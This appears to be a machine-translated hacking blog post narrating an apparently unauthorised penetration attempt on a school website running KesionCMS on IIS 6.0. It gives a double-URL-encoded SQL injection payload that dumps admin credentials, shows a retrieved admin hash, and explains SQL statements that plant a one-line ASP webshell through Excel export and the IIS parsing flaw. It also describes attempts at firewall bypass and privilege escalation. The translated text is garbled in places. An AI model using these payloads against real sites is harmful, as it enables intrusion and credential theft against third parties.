00 houbai fumei school-a black broad Penetration Process

The cause is very simple. Why did I receive this message in my QQ mailbox subscription?

After 00, Bai fumei said, '''why is there no object in the 90 s '''

They opened the school.

XX lab school... (We are in the spirit of learning, the whole process of code .)

Baidu zhi''

The website is www. ****. cn

IIS/6.0

The website generates static pages...

Let's look at the background ....

The background was changed by a CMS... So what is this CMS ???

This is coxun's CMS... We know what ??? Because

Adding 8 in the website background will show the original face '''

Now that we know it's coxun, we can make better use of it.

Baidu kexun Vulnerability

Vulnerabilities submitted by wooyun

Haha RP

Submission time:

Public Date:

Specific: http://www.bkjia.com/Article/201207/139333.html

Injection statement: % ') union select 1, 2, username +' | '+ password from KS_Admin
The conversion is as follows:
/Plus/ajaxs. asp? Action = GetRelativeItem & key = search % 2525% 2527% 2529% 2520% 2575% 256e % 2569% 256f % 256e % 2520% 2573% 2565% 256c % 2565% 2563% 2574% 2520% 2531% 252c % 2532% 252c % 2575% 2573% 2565% 2572% 256e % 2561% 256d % 2565% 252b % 2527% 257c % 2527% 252b % 2570% 2561% 2573% 2573% 256f % 2577% 2572% 2564% 2520% 2566% 2572% 256f % 256d % 2520% 254b % 2553% 255f % 2541% 256d % 2564% maid % 2500

You can use this code to manage accounts and passwords.

This shows how to perform transcoding, but some people may not know how to perform transcoding ....

In fact, this is a second Transcoding

First Transcoding

% 75% 6E % 69% 6F % 6E after Union Transcoding

Second Transcoding

We use the URLENconde encoding of gb2313 for second transcoding.

% 75% 6E % 69% 6F % 6E % 2575% 256E % 2569% 256F % 256E after Transcoding

In this way, you should understand how to switch back and forth ~

Now we have the account password, but we do not have the authentication code.

<Option value = '1 | 2'> admin | 8ae2232b1cd2bd90 </option>

The authentication code is saved in the Conn. asp file.

We only need to know this file.

That is to say, it is still not possible to have an account password.

Bytes ----------------------------------------------------------------------------------------

Registration is disabled for the website.

A bbs forbidden to register

With BBS background

By Dvbbs.net

Internet forums...

Ah ah

The Administrator also restricts the download prevention. mdb suffix.

It seems that the Administrator is aware of the management...

The main site is waiting for a long time ''''

Remember the address we just found?

Why didn't you want to start from this place?

Dumb

All you understand by default

Let's see what we see...

We went in.

Now shell is used.

There is no drama to directly launch the project.

Because all the stations on this server are smart, you know it!

8.0 using shell is an SQL statement

Normally

Run the Code:
1. create table cmd (a varchar (50 ))
2. insert into cmd (a) values ('<% execute request (chr (35) %> ')
3. select * into [a] in 'd: \ wwwroot \ m3loee.asa).xls ''excel 4.0;' from cmd;
4. drop table cmd;
Explanation:
1. create table cmd (a varchar (50) create a table with a field a named cmd field type with a length of 50 characters
2. insert into cmd (a) values ('<% execute request (chr (35) %>') insert a statement Trojan with the password # in field a of table cmd
3. select * into [a] in 'd: \ wwwroot \ m3loee.asa).xls ''excel 4.0;' from cmd exports the contents of the cmd table to an excel file in the physical path, why excel files are used, because ACCESS databases cannot export other dangerous formats. After exporting to excel, we can use the IIS Parsing Vulnerability to become our pony.
4. drop table cmd Delete table

But execute to the third sentence... Problem Found

We are dead.

Another one is simpler.

SELECT '<% execute request ("a") %>' into [0 ldgui] in 'd: \ wwwroot \ ***** \ wwwroot \ 8 + 1.asp( 1.asp) 'excel 8.0; 'from 0 ldgui

The following database is read-only.

Error Code	Source	Description	Help	Help documentation
-2147217911	Cannot be updated. The database or object is read-only.	Microsoft JET Database Engine	5003027

It seems that shell cannot be used in the background.

Even if we get the authentication code of the target station, we cannot get shell in the background.

No permission can be raised by the bypass.

Full path of the primary database: D: \ wwwroot \ *** \ wwwroot \ 8 \ KS_Data \ KesionCMS8.mdb
The complete path of the collection database is D: \ wwwroot \ *** \ wwwroot \ KS_Data \ Collect \ KS_Collect.Mdb.

90sec scalpers may be able to exploit a scientific vulnerability.

However, the PHP environment is not installed on the local machine.

We have to note that...

There will be hope for one of the 134 sites ....

Let's talk about the process of getting shell in the background.

There is a backup in the background, but one thing is that there is no upload.

How can I get a picture without upload?

No database. It turns out to be asp.

We add an encrypted sentence in the background.

Back up the website

In this way

However, website permissions are very dead and there is no way

There is no way for the website to be uploaded

The upload Trojan prompts firewall Interception

The side-by-side message is dead.

The website data permission is read-only. I guess we cannot get the authentication code in time to get the shell.